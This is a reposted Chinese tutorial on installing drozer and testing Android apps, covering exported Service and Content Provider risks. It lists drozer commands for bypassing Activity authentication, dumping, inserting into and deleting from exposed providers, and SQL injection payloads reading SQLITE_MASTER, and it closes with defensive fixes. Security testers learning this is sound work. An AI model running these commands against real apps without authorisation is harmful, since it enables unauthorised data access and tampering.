一、Dorzer安装

需要用到如下两个工具：如以前安装过mercury，这两个工具应该已经有了。

Java Runtime Environment (JRE) or Java Development Kit (JDK)

Android SDK

下载安装后需要把adb和java工具路径写入PATH环境变量中

1、下载：打开此下载地址，windows环境选择drozer (Windows Installer)并下载

https://www.mwrinfosecurity.com/products/drozer/community-edition/

2、安装：解压zip文件并点击setup安装，一路默认安装就行；它会自动安装到C:\drozer文件夹下。

3、检测是否安装成功：

打开cmd窗口，键入C:\drozer\drozer.bat , 如出现如下提示说明安装成功。

4、安装agent客户端到手机：

确保手机debug模式开启，通过USB连接到PC上，通过如下命令安装agent.apk客户端。

adb install agent.apk

安装完成后启动drozerAgent

点击右下角“开启”按钮，开启Agent

5、建立session连接：

保持手机与PC通过USB连接正常，然后通过cmd窗口键入如下命令

adb forward tcp:31415 tcp:31415

drozer console connect 或 C:\drozer\drozer.bat console connect

出现android头像及：

dz>

命令提示符表示连接成功

6、具体安装步骤和使用方法详见文件：mwri_drozer-users-guide_2013-09-11.pdf

https://www.mwrinfosecurity.com/system/assets/559/original/mwri_drozer-users-guide_2013-09-11.pdf

修复连接时java路径找不到问题:

1、创建如下文件并命名为：1.txt (如果为winXP，则可以直接命名为.drozer_config)

2、写入内容如下几行内容：此处为java.exe文件的安装位置，具体情况具体处理。

[executables]

java =C:\Program Files\Java\jdk1.7.0_40\bin\java.exe

javac =C:\Program Files\Java\jdk1.7.0_04\bin\javac.exe

dx =F:\Android\android-sdk_r18-windows\android-sdk-windows\platform-tools\dx.bat

3、把此文件放入个人目录下文件夹：

英文：C:\Users\\

中文：C:\用户\\

4、通过cmd命令重命名此文件为：.drozer_config

rename  C:\Users\d00218136\1.txt .drozer_config

二、android组件安全分析

service组件风险分析

Service是后台运行服务，它不在UI界面显示，其安全相关特征：

Exported设置为Ture就表示可以外部调用，暴露状态；False为不可外部调用。

如果至少含有一个intent-filter，则其默认exported状态为Ture。

如果一个intent-filter也没有，则其默认exported状态为False。

Permission设置，有此设置则只有申请此permission的应用才可以访问。

风险Service的情况：

与某项功能或服务有联系，恶意应用通过伪造intent信息进行Server欺骗***来控制某项功能或服务。

应用内部通过隐式消息(implicitintent)来调用其Service，使其含有潜在的Service劫持风险。

Content Provider组件风险分析

Contentprovider组件相当于应用的数据库接口，应用通过此组件进行查询更新其数据库中的数据；其安全相关特征：

Exported设置为True就表示可以外部调用，暴露状态；False为不可外部调用。

不同于其他三个组件：它不受到intent-filter的影响。

Exported默认为True: 当minSdkVersion 或targetSdkVersion设置为"16"或更低时。

Exported默认为False: 当minSdkVersion 或targetSdkVersion设置为"17"或更高时。

Permission设置，有此设置则只有申请此permission的应用才可以访问。

同时还可单独设置读写权限：Read/Writepermission;如果这两个权限没有设置(也即其读写权限为null)，则表示访问此content provider不需要读写权限。

三、Drozer使用

获取apk信息

•1)查找终端设备所有APK信息

Run app.packege.list–f过滤信息

•(2)具体查看某个APK信息

Run app.package.info –a apk名

•(3)查找APK存在的***面(activity、contentprovider、service)

Run app.package.attacksurfaceapk名

绕过Activity鉴权

•(1)收集Activity的信息进行收集，查找暴露的Activity

Run app.activity.info –a apk包名

(2)构造intent信息绕过鉴权直接运行Activity

Run app.activity.start–-componentcom.mwr.example.sieve包名

利用ContentProvider***

•(1)收集ContentProvider的信息进行收集，查找暴露的ContentProvider

Run app.provider.info –a apk包名

•(2)发现暴露的ContentProvider后，可以对数据库进行探测。探测出可以查询的URI

Run scanner.provider.finduris–aapk包名

•(3)查看数据库中的内容

Run app.provider.queryURI –vertical

•(4)对数据库表进行插入操作

Run app.provider.insertURI对应数据表中的字段

•(5)对数据库表进行删除操作

Runapp.provider.deleteURI–-selection “条件”

SQL注入

•(1)查看URI对应的数据库表

Run app.provider.queryURI–-projection “ ‘ ”

Run app.provider.queryURI–-selection “ ‘ ”

•(2)可以通过返回的错误信息展示出改Content准备执行的语句，获取数据库中的信息

Run app.provider.queryURI–projection “* From SQLITE_MASTER WHERE type=‘table’;--”

Run app.provider.queryURI–-selection “_id = ?”

预防

(1)进行权限控制，对此组件进行exported=“false”或者设置调用需要申请的权限

(2)SQLiteStatementsqLiteStatement=db.compileStatement("insertinto chat(fromuid,touid,msg) values(?, ?, ?)");

sqLiteStatement.bindLong(1, 12);

sqLiteStatement.bindLong(2, 13);

sqLiteStatement.bindString(3,text);

longnewRowId=sqLiteStatement.executeInsert();

四、使用示例

http://www.freebuf.com/tools/26503.html

http://www.freebuf.com/articles/terminal/33127.html

转自：http://blog.csdn.net/zsch591488385/article/details/38423627